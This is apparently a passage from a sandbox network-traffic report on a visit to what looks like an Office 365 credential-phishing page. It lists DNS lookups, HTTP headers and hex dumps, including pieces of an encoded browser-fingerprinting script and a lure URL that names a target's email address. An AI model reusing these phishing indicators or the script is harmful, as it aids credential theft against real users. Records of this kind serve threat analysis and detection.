                                                        Mar 27, 2025 14:41:25.416585922 CET1.1.1.1192.168.2.50xceNo error (0)www.w3schools.com-v1.edgesuite.neta1400.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416585922 CET1.1.1.1192.168.2.50xceNo error (0)a1400.dscb.akamai.net23.44.201.164A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416585922 CET1.1.1.1192.168.2.50xceNo error (0)a1400.dscb.akamai.net23.44.201.166A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416599989 CET1.1.1.1192.168.2.50x3bbfNo error (0)www.w3schools.comwww.w3schools.com-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416599989 CET1.1.1.1192.168.2.50x3bbfNo error (0)www.w3schools.com-v1.edgesuite.neta1400.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416613102 CET1.1.1.1192.168.2.50xd529No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416613102 CET1.1.1.1192.168.2.50xd529No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.418090105 CET1.1.1.1192.168.2.50x7843No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.430932045 CET1.1.1.1192.168.2.50x83bdNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.305064917 CET1.1.1.1192.168.2.50xf2cNo error (0)shed.dual-low.s-part-0013.t-0009.t-msedge.nets-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.305064917 CET1.1.1.1192.168.2.50xf2cNo error (0)s-part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.305933952 CET1.1.1.1192.168.2.50x2185No error (0)shed.dual-low.s-part-0013.t-0009.t-msedge.nets-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.305933952 CET1.1.1.1192.168.2.50x2185No error (0)s-part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.308700085 CET1.1.1.1192.168.2.50xb7f5No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.308700085 CET1.1.1.1192.168.2.50xb7f5No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.308700085 CET1.1.1.1192.168.2.50xb7f5No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.308700085 CET1.1.1.1192.168.2.50xb7f5No error (0)e329293.dscd.akamaiedge.net23.209.72.9A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.308700085 CET1.1.1.1192.168.2.50xb7f5No error (0)e329293.dscd.akamaiedge.net23.209.72.31A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.309103966 CET1.1.1.1192.168.2.50x6f6aNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.309103966 CET1.1.1.1192.168.2.50x6f6aNo error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.309103966 CET1.1.1.1192.168.2.50x6f6aNo error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791951895 CET1.1.1.1192.168.2.50xda3No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791951895 CET1.1.1.1192.168.2.50xda3No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791951895 CET1.1.1.1192.168.2.50xda3No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791951895 CET1.1.1.1192.168.2.50xda3No error (0)e329293.dscd.akamaiedge.net23.209.72.31A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791951895 CET1.1.1.1192.168.2.50xda3No error (0)e329293.dscd.akamaiedge.net23.209.72.9A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791977882 CET1.1.1.1192.168.2.50x5190No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791977882 CET1.1.1.1192.168.2.50x5190No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.791977882 CET1.1.1.1192.168.2.50x5190No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.863396883 CET1.1.1.1192.168.2.50xe971No error (0)shed.dual-low.s-part-0013.t-0009.t-msedge.nets-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.863396883 CET1.1.1.1192.168.2.50xe971No error (0)s-part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:28.799396038 CET1.1.1.1192.168.2.50xd263No error (0)www.oyabarista.com172.67.168.189A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:28.799396038 CET1.1.1.1192.168.2.50xd263No error (0)www.oyabarista.com104.21.70.232A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:28.799417973 CET1.1.1.1192.168.2.50x6f3aNo error (0)www.oyabarista.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:40.091831923 CET1.1.1.1192.168.2.50xefd3No error (0)mssnet0nses.click65IN (0x0001)false
                                                        Mar 27, 2025 14:41:40.104636908 CET1.1.1.1192.168.2.50x8e04No error (0)mssnet0nses.click172.64.80.1A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:41.312186003 CET1.1.1.1192.168.2.50x1b11No error (0)mssnet0nses.click172.64.80.1A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:41.312200069 CET1.1.1.1192.168.2.50xb9c1No error (0)mssnet0nses.click65IN (0x0001)false
                                                        Mar 27, 2025 14:42:19.652960062 CET1.1.1.1192.168.2.50x8866No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        • www.oyabarista.com
                                                          • cdnjs.cloudflare.com
                                                          • www.w3schools.com
                                                          • cdn.socket.io
                                                          • aadcdn.msftauth.net
                                                          • mssnet0nses.click
                                                        • a.nel.cloudflare.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549727104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:16 UTC764OUTGET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:18 UTC801INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VP0gL7Zsmm%2BrNUP9n9BF%2BxW6RR%2FAU2vVlUyh%2B4dm3Mu4wNU6jJ9vev6LRp%2FoV2Y%2FbiPPhCxhI9NdgYudex0T9sR8qvvPz5kxDBJL10KHr6dV9ZFwOElgmZmKJc1mzk3KkB4ckZE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4decb8174339-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83627&min_rtt=83534&rtt_var=17707&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1336&delivery_rate=36584&cwnd=252&unsent_bytes=0&cid=0a62dfc20dae8e0e&ts=1417&x=0"
                                                        2025-03-27 13:41:18 UTC568INData Raw: 62 33 63 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0a 20 20 20 20 20 20 3c 69 6d 67
                                                        Data Ascii: b3c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> </head> <body> <div id="root"> <img
                                                        2025-03-27 13:41:18 UTC1369INData Raw: 31 6a 59 58 52 6a 61 43 68 30 4b 58 74 6c 4c 6e 42 31 63 32 67 6f 64 43 35 74 5a 58 4e 7a 59 57 64 6c 4b 58 31 39 5a 6d 39 79 4b 48 5a 68 63 69 42 6b 49 47 6c 75 49 47 45 70 62 69 68 6b 4b 54 74 30 63 6e 6c 37 64 6d 46 79 49 47 63 39 54 32 4a 71 5a 57 4e 30 4c 6d 64 6c 64 45 39 33 62 6c 42 79 62 33 42 6c 63 6e 52 35 54 6d 46 74 5a 58 4d 6f 59 53 6b 37 5a 6d 39 79 4b 47 51 39 4d 44 74 6b 50 47 63 75 62 47 56 75 5a 33 52 6f 4f 79 73 72 5a 43 6c 75 4b 47 64 62 5a 46 30 70 4f 32 5a 62 49 69 45 68 49 6c 30 39 5a 33 31 6a 59 58 52 6a 61 43 68 73 4b 58 74 6c 4c 6e 42 31 63 32 67 6f 62 43 35 74 5a 58 4e 7a 59 57 64 6c 4b 58 31 79 5a 58 52 31 63 6d 34 67 5a 6e 31 39 59 69 35 7a 59 33 4a 6c 5a 57 34 39 59 79 68 33 61 57 35 6b 62 33 63 75 63 32 4e 79 5a 57 56 75 4b
                                                        Data Ascii: 1jYXRjaCh0KXtlLnB1c2godC5tZXNzYWdlKX19Zm9yKHZhciBkIGluIGEpbihkKTt0cnl7dmFyIGc9T2JqZWN0LmdldE93blByb3BlcnR5TmFtZXMoYSk7Zm9yKGQ9MDtkPGcubGVuZ3RoOysrZCluKGdbZF0pO2ZbIiEhIl09Z31jYXRjaChsKXtlLnB1c2gobC5tZXNzYWdlKX1yZXR1cm4gZn19Yi5zY3JlZW49Yyh3aW5kb3cuc2NyZWVuK
                                                        2025-03-27 13:41:18 UTC946INData Raw: 6b 62 33 49 36 62 53 35 6e 5a 58 52 51 59 58 4a 68 62 57 56 30 5a 58 49 6f 63 69 35 56 54 6b 31 42 55 30 74 46 52 46 39 57 52 55 35 45 54 31 4a 66 56 30 56 43 52 30 77 70 4c 48 4a 6c 62 6d 52 6c 63 6d 56 79 4f 6d 30 75 5a 32 56 30 55 47 46 79 59 57 31 6c 64 47 56 79 4b 48 49 75 56 55 35 4e 51 56 4e 4c 52 55 52 66 55 6b 56 4f 52 45 56 53 52 56 4a 66 56 30 56 43 52 30 77 70 66 58 31 6a 59 58 52 6a 61 43 68 68 4b 58 74 6c 4c 6e 42 31 63 32 67 6f 59 53 35 74 5a 58 4e 7a 59 57 64 6c 4b 58 31 6d 64 57 35 6a 64 47 6c 76 62 69 42 6f 4b 47 45 73 5a 69 78 6b 4b 58 74 32 59 58 49 67 5a 7a 31 68 4c 6e 42 79 62 33 52 76 64 48 6c 77 5a 56 74 6d 58 54 74 68 4c 6e 42 79 62 33 52 76 64 48 6c 77 5a 56 74 6d 58 54 31 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 32 49 75 63 48
                                                        Data Ascii: kb3I6bS5nZXRQYXJhbWV0ZXIoci5VTk1BU0tFRF9WRU5ET1JfV0VCR0wpLHJlbmRlcmVyOm0uZ2V0UGFyYW1ldGVyKHIuVU5NQVNLRURfUkVOREVSRVJfV0VCR0wpfX1jYXRjaChhKXtlLnB1c2goYS5tZXNzYWdlKX1mdW5jdGlvbiBoKGEsZixkKXt2YXIgZz1hLnByb3RvdHlwZVtmXTthLnByb3RvdHlwZVtmXT1mdW5jdGlvbigpe2IucH
                                                        2025-03-27 13:41:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549726104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:18 UTC705OUTGET /files/images/Logo.png HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:19 UTC958INHTTP/1.1 404 Not Found
                                                        Date: Thu, 27 Mar 2025 13:41:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        Cache-Control: max-age=14400, must-revalidate
                                                        Link: <https://www.oyabarista.com/wp-json/>; rel="https://api.w.org/"
                                                        CF-Cache-Status: EXPIRED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1U%2Bk9gUniMBmSCvMHGoFCfN3uCbfV2pr7qw8OajNonIyprtF1UYWICfL7KCAAYXomRfuWcgjDJayA0yM0VupPPpSt20FjvJY16arwC%2FPXr4ho20eT6lp54qNsJB7abZW2qyAVDk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4df4ff2e4544-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84156&min_rtt=84134&rtt_var=17781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1277&delivery_rate=36304&cwnd=252&unsent_bytes=0&cid=772a18d1f93e208e&ts=2818&x=0"
                                                        2025-03-27 13:41:19 UTC411INData Raw: 37 37 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 09 09 09 0a 09 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 79 61 62 61 72 69 73 74 61 2e 63 6f 6d 2f 66 69 6c 65 73 2f 69 6d 61 67 65 73 2f 4c 6f 67 6f 2e 70 6e 67 22 2f 3e 0a 09 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 2f 3e 0a 09 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 26 23 30 33 39 3b 59 41 20 42 41 52 49 53 54 41 22 2f 3e 0a 09 09 09 3c 6d 65 74 61 20
                                                        Data Ascii: 77eb<!DOCTYPE html><html lang="en"><head><meta property="og:url" content="https://www.oyabarista.com/files/images/Logo.png"/><meta property="og:type" content="article"/><meta property="og:title" content="O&#039;YA BARISTA"/><meta
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 74 69 76 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 39 2f 30 34 2f 6f 70 65 6e 5f 67 72 61 70 68 2e 6a 70 67 22 2f 3e 0a 09 09 0a 09 09 09 09 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 09 0a 09 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74
                                                        Data Ascii: tive.com/wp-content/uploads/2019/04/open_graph.jpg"/><meta charset="UTF-8"/><link rel="profile" href="https://gmpg.org/xfn/11" /><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=yes"><title>Page not
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66
                                                        Data Ascii: ta),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udf
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66
                                                        Data Ascii: {var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undef
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27
                                                        Data Ascii: der: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet'
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                                                        Data Ascii: --gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--grad
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d
                                                        Data Ascii: 48,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 61 6c 69 67 6e 6c 65 66 74 29 3a 6e 6f 74 28 2e 61 6c 69 67 6e 72 69 67 68 74 29 3a 6e 6f 74 28 2e 61 6c 69 67 6e 66 75 6c 6c 29 29 7b 6d 61 78 2d 77 69 64 74 68 3a 20 76 61
                                                        Data Ascii: ght;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: va
